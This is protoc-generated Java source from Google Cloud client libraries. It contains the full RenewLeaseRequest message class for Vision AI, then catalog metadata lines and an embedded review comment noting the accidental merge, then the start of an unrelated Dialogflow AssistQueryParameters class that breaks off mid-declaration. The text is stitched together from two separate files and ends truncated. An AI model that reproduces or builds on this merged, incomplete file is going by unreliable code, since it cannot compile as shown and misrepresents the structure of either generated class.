/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/visionai/v1/streaming_service.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.visionai.v1; /** * * * <pre> * Request message for renewing a lease. * </pre> * * Protobuf type {@code google.cloud.visionai.v1.RenewLeaseRequest} */ public final class RenewLeaseRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.visionai.v1.RenewLeaseRequest) RenewLeaseRequestOrBuilder { private static final long serialVersionUID = 0L; // Use RenewLeaseRequest.newBuilder() to construct. 
private RenewLeaseRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private RenewLeaseRequest() { id_ = ""; series_ = ""; owner_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new RenewLeaseRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.visionai.v1.StreamingServiceProto .internal_static_google_cloud_visionai_v1_RenewLeaseRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.visionai.v1.StreamingServiceProto .internal_static_google_cloud_visionai_v1_RenewLeaseRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.visionai.v1.RenewLeaseRequest.class, com.google.cloud.visionai.v1.RenewLeaseRequest.Builder.class); } private int bitField0_; public static final int ID_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object id_ = ""; /** * * * <pre> * Lease id. * </pre> * * <code>string id = 1;</code> * * @return The id. */ @java.lang.Override public java.lang.String getId() { java.lang.Object ref = id_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); id_ = s; return s; } } /** * * * <pre> * Lease id. * </pre> * * <code>string id = 1;</code> * * @return The bytes for id. 
*/ @java.lang.Override public com.google.protobuf.ByteString getIdBytes() { java.lang.Object ref = id_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); id_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int SERIES_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object series_ = ""; /** * * * <pre> * Series name. * </pre> * * <code>string series = 2;</code> * * @return The series. */ @java.lang.Override public java.lang.String getSeries() { java.lang.Object ref = series_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); series_ = s; return s; } } /** * * * <pre> * Series name. * </pre> * * <code>string series = 2;</code> * * @return The bytes for series. */ @java.lang.Override public com.google.protobuf.ByteString getSeriesBytes() { java.lang.Object ref = series_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); series_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int OWNER_FIELD_NUMBER = 3; @SuppressWarnings("serial") private volatile java.lang.Object owner_ = ""; /** * * * <pre> * Lease owner. * </pre> * * <code>string owner = 3;</code> * * @return The owner. */ @java.lang.Override public java.lang.String getOwner() { java.lang.Object ref = owner_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); owner_ = s; return s; } } /** * * * <pre> * Lease owner. * </pre> * * <code>string owner = 3;</code> * * @return The bytes for owner. 
*/ @java.lang.Override public com.google.protobuf.ByteString getOwnerBytes() { java.lang.Object ref = owner_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); owner_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int TERM_FIELD_NUMBER = 4; private com.google.protobuf.Duration term_; /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> * * @return Whether the term field is set. */ @java.lang.Override public boolean hasTerm() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> * * @return The term. */ @java.lang.Override public com.google.protobuf.Duration getTerm() { return term_ == null ? com.google.protobuf.Duration.getDefaultInstance() : term_; } /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> */ @java.lang.Override public com.google.protobuf.DurationOrBuilder getTermOrBuilder() { return term_ == null ? 
com.google.protobuf.Duration.getDefaultInstance() : term_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(id_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, id_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(series_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, series_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(owner_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 3, owner_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(4, getTerm()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(id_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, id_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(series_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, series_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(owner_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(3, owner_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(4, getTerm()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.visionai.v1.RenewLeaseRequest)) { return super.equals(obj); } com.google.cloud.visionai.v1.RenewLeaseRequest other = 
(com.google.cloud.visionai.v1.RenewLeaseRequest) obj; if (!getId().equals(other.getId())) return false; if (!getSeries().equals(other.getSeries())) return false; if (!getOwner().equals(other.getOwner())) return false; if (hasTerm() != other.hasTerm()) return false; if (hasTerm()) { if (!getTerm().equals(other.getTerm())) return false; } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + ID_FIELD_NUMBER; hash = (53 * hash) + getId().hashCode(); hash = (37 * hash) + SERIES_FIELD_NUMBER; hash = (53 * hash) + getSeries().hashCode(); hash = (37 * hash) + OWNER_FIELD_NUMBER; hash = (53 * hash) + getOwner().hashCode(); if (hasTerm()) { hash = (37 * hash) + TERM_FIELD_NUMBER; hash = (53 * hash) + getTerm().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom(java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static 
com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, 
extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.cloud.visionai.v1.RenewLeaseRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Request message for renewing a lease. * </pre> * * Protobuf type {@code google.cloud.visionai.v1.RenewLeaseRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.visionai.v1.RenewLeaseRequest) com.google.cloud.visionai.v1.RenewLeaseRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.visionai.v1.StreamingServiceProto .internal_static_google_cloud_visionai_v1_RenewLeaseRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.visionai.v1.StreamingServiceProto .internal_static_google_cloud_visionai_v1_RenewLeaseRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.visionai.v1.RenewLeaseRequest.class, com.google.cloud.visionai.v1.RenewLeaseRequest.Builder.class); } // Construct using com.google.cloud.visionai.v1.RenewLeaseRequest.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if 
(com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) { getTermFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; id_ = ""; series_ = ""; owner_ = ""; term_ = null; if (termBuilder_ != null) { termBuilder_.dispose(); termBuilder_ = null; } return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.visionai.v1.StreamingServiceProto .internal_static_google_cloud_visionai_v1_RenewLeaseRequest_descriptor; } @java.lang.Override public com.google.cloud.visionai.v1.RenewLeaseRequest getDefaultInstanceForType() { return com.google.cloud.visionai.v1.RenewLeaseRequest.getDefaultInstance(); } @java.lang.Override public com.google.cloud.visionai.v1.RenewLeaseRequest build() { com.google.cloud.visionai.v1.RenewLeaseRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.visionai.v1.RenewLeaseRequest buildPartial() { com.google.cloud.visionai.v1.RenewLeaseRequest result = new com.google.cloud.visionai.v1.RenewLeaseRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.cloud.visionai.v1.RenewLeaseRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.id_ = id_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.series_ = series_; } if (((from_bitField0_ & 0x00000004) != 0)) { result.owner_ = owner_; } int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000008) != 0)) { result.term_ = termBuilder_ == null ? 
term_ : termBuilder_.build(); to_bitField0_ |= 0x00000001; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.visionai.v1.RenewLeaseRequest) { return mergeFrom((com.google.cloud.visionai.v1.RenewLeaseRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.visionai.v1.RenewLeaseRequest other) { if (other == com.google.cloud.visionai.v1.RenewLeaseRequest.getDefaultInstance()) return this; if (!other.getId().isEmpty()) { id_ = other.id_; bitField0_ |= 0x00000001; onChanged(); } if (!other.getSeries().isEmpty()) { series_ = other.series_; bitField0_ |= 0x00000002; onChanged(); } if (!other.getOwner().isEmpty()) { owner_ = other.owner_; bitField0_ |= 0x00000004; onChanged(); } if (other.hasTerm()) { mergeTerm(other.getTerm()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( 
com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { id_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { series_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 case 26: { owner_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000004; break; } // case 26 case 34: { input.readMessage(getTermFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000008; break; } // case 34 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object id_ = ""; /** * * * <pre> * Lease id. * </pre> * * <code>string id = 1;</code> * * @return The id. */ public java.lang.String getId() { java.lang.Object ref = id_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); id_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Lease id. * </pre> * * <code>string id = 1;</code> * * @return The bytes for id. */ public com.google.protobuf.ByteString getIdBytes() { java.lang.Object ref = id_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); id_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Lease id. * </pre> * * <code>string id = 1;</code> * * @param value The id to set. 
* @return This builder for chaining. */ public Builder setId(java.lang.String value) { if (value == null) { throw new NullPointerException(); } id_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Lease id. * </pre> * * <code>string id = 1;</code> * * @return This builder for chaining. */ public Builder clearId() { id_ = getDefaultInstance().getId(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * * * <pre> * Lease id. * </pre> * * <code>string id = 1;</code> * * @param value The bytes for id to set. * @return This builder for chaining. */ public Builder setIdBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); id_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private java.lang.Object series_ = ""; /** * * * <pre> * Series name. * </pre> * * <code>string series = 2;</code> * * @return The series. */ public java.lang.String getSeries() { java.lang.Object ref = series_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); series_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Series name. * </pre> * * <code>string series = 2;</code> * * @return The bytes for series. */ public com.google.protobuf.ByteString getSeriesBytes() { java.lang.Object ref = series_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); series_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Series name. * </pre> * * <code>string series = 2;</code> * * @param value The series to set. * @return This builder for chaining. 
*/ public Builder setSeries(java.lang.String value) { if (value == null) { throw new NullPointerException(); } series_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Series name. * </pre> * * <code>string series = 2;</code> * * @return This builder for chaining. */ public Builder clearSeries() { series_ = getDefaultInstance().getSeries(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * Series name. * </pre> * * <code>string series = 2;</code> * * @param value The bytes for series to set. * @return This builder for chaining. */ public Builder setSeriesBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); series_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } private java.lang.Object owner_ = ""; /** * * * <pre> * Lease owner. * </pre> * * <code>string owner = 3;</code> * * @return The owner. */ public java.lang.String getOwner() { java.lang.Object ref = owner_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); owner_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Lease owner. * </pre> * * <code>string owner = 3;</code> * * @return The bytes for owner. */ public com.google.protobuf.ByteString getOwnerBytes() { java.lang.Object ref = owner_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); owner_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Lease owner. * </pre> * * <code>string owner = 3;</code> * * @param value The owner to set. * @return This builder for chaining. 
*/ public Builder setOwner(java.lang.String value) { if (value == null) { throw new NullPointerException(); } owner_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * Lease owner. * </pre> * * <code>string owner = 3;</code> * * @return This builder for chaining. */ public Builder clearOwner() { owner_ = getDefaultInstance().getOwner(); bitField0_ = (bitField0_ & ~0x00000004); onChanged(); return this; } /** * * * <pre> * Lease owner. * </pre> * * <code>string owner = 3;</code> * * @param value The bytes for owner to set. * @return This builder for chaining. */ public Builder setOwnerBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); owner_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } private com.google.protobuf.Duration term_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.Duration, com.google.protobuf.Duration.Builder, com.google.protobuf.DurationOrBuilder> termBuilder_; /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> * * @return Whether the term field is set. */ public boolean hasTerm() { return ((bitField0_ & 0x00000008) != 0); } /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> * * @return The term. */ public com.google.protobuf.Duration getTerm() { if (termBuilder_ == null) { return term_ == null ? com.google.protobuf.Duration.getDefaultInstance() : term_; } else { return termBuilder_.getMessage(); } } /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> */ public Builder setTerm(com.google.protobuf.Duration value) { if (termBuilder_ == null) { if (value == null) { throw new NullPointerException(); } term_ = value; } else { termBuilder_.setMessage(value); } bitField0_ |= 0x00000008; onChanged(); return this; } /** * * * <pre> * Lease term. 
* </pre> * * <code>.google.protobuf.Duration term = 4;</code> */ public Builder setTerm(com.google.protobuf.Duration.Builder builderForValue) { if (termBuilder_ == null) { term_ = builderForValue.build(); } else { termBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000008; onChanged(); return this; } /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> */ public Builder mergeTerm(com.google.protobuf.Duration value) { if (termBuilder_ == null) { if (((bitField0_ & 0x00000008) != 0) && term_ != null && term_ != com.google.protobuf.Duration.getDefaultInstance()) { getTermBuilder().mergeFrom(value); } else { term_ = value; } } else { termBuilder_.mergeFrom(value); } if (term_ != null) { bitField0_ |= 0x00000008; onChanged(); } return this; } /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> */ public Builder clearTerm() { bitField0_ = (bitField0_ & ~0x00000008); term_ = null; if (termBuilder_ != null) { termBuilder_.dispose(); termBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> */ public com.google.protobuf.Duration.Builder getTermBuilder() { bitField0_ |= 0x00000008; onChanged(); return getTermFieldBuilder().getBuilder(); } /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> */ public com.google.protobuf.DurationOrBuilder getTermOrBuilder() { if (termBuilder_ != null) { return termBuilder_.getMessageOrBuilder(); } else { return term_ == null ? com.google.protobuf.Duration.getDefaultInstance() : term_; } } /** * * * <pre> * Lease term. 
* </pre> * * <code>.google.protobuf.Duration term = 4;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.Duration, com.google.protobuf.Duration.Builder, com.google.protobuf.DurationOrBuilder> getTermFieldBuilder() { if (termBuilder_ == null) { termBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.Duration, com.google.protobuf.Duration.Builder, com.google.protobuf.DurationOrBuilder>( getTerm(), getParentForChildren(), isClean()); term_ = null; } return termBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.visionai.v1.RenewLeaseRequest) } // @@protoc_insertion_point(class_scope:google.cloud.visionai.v1.RenewLeaseRequest) private static final com.google.cloud.visionai.v1.RenewLeaseRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.visionai.v1.RenewLeaseRequest(); } public static com.google.cloud.visionai.v1.RenewLeaseRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<RenewLeaseRequest> PARSER = new com.google.protobuf.AbstractParser<RenewLeaseRequest>() { @java.lang.Override public RenewLeaseRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw 
e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<RenewLeaseRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<RenewLeaseRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.visionai.v1.RenewLeaseRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
// NOTE(review): The three lines below are not Java source. They are dataset/catalog
// metadata (repository id, file size, and the path of the next file) that was
// accidentally concatenated between two unrelated protoc-generated sources:
// the end of com.google.cloud.visionai.v1.RenewLeaseRequest above, and the start of
// com.google.cloud.dialogflow.v2beta1.AssistQueryParameters below. The two generated
// classes should live in separate files and be regenerated by protoc, not hand-edited.
// googleapis/google-cloud-java
// 35,788
// java-dialogflow/proto-google-cloud-dialogflow-v2beta1/src/main/java/com/google/cloud/dialogflow/v2beta1/AssistQueryParameters.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/dialogflow/v2beta1/participant.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.dialogflow.v2beta1; /** * * * <pre> * Represents the parameters of human assist query. * </pre> * * Protobuf type {@code google.cloud.dialogflow.v2beta1.AssistQueryParameters} */ public final class AssistQueryParameters extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.dialogflow.v2beta1.AssistQueryParameters) AssistQueryParametersOrBuilder { private static final long serialVersionUID = 0L; // Use AssistQueryParameters.newBuilder() to construct. 
private AssistQueryParameters(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private AssistQueryParameters() {} @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new AssistQueryParameters(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.dialogflow.v2beta1.ParticipantProto .internal_static_google_cloud_dialogflow_v2beta1_AssistQueryParameters_descriptor; } @SuppressWarnings({"rawtypes"}) @java.lang.Override protected com.google.protobuf.MapFieldReflectionAccessor internalGetMapFieldReflection( int number) { switch (number) { case 1: return internalGetDocumentsMetadataFilters(); default: throw new RuntimeException("Invalid map field number: " + number); } } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.dialogflow.v2beta1.ParticipantProto .internal_static_google_cloud_dialogflow_v2beta1_AssistQueryParameters_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.dialogflow.v2beta1.AssistQueryParameters.class, com.google.cloud.dialogflow.v2beta1.AssistQueryParameters.Builder.class); } public static final int DOCUMENTS_METADATA_FILTERS_FIELD_NUMBER = 1; private static final class DocumentsMetadataFiltersDefaultEntryHolder { static final com.google.protobuf.MapEntry<java.lang.String, java.lang.String> defaultEntry = com.google.protobuf.MapEntry.<java.lang.String, java.lang.String>newDefaultInstance( com.google.cloud.dialogflow.v2beta1.ParticipantProto .internal_static_google_cloud_dialogflow_v2beta1_AssistQueryParameters_DocumentsMetadataFiltersEntry_descriptor, com.google.protobuf.WireFormat.FieldType.STRING, "", com.google.protobuf.WireFormat.FieldType.STRING, ""); } @SuppressWarnings("serial") private com.google.protobuf.MapField<java.lang.String, java.lang.String> 
documentsMetadataFilters_; private com.google.protobuf.MapField<java.lang.String, java.lang.String> internalGetDocumentsMetadataFilters() { if (documentsMetadataFilters_ == null) { return com.google.protobuf.MapField.emptyMapField( DocumentsMetadataFiltersDefaultEntryHolder.defaultEntry); } return documentsMetadataFilters_; } public int getDocumentsMetadataFiltersCount() { return internalGetDocumentsMetadataFilters().getMap().size(); } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ @java.lang.Override public boolean 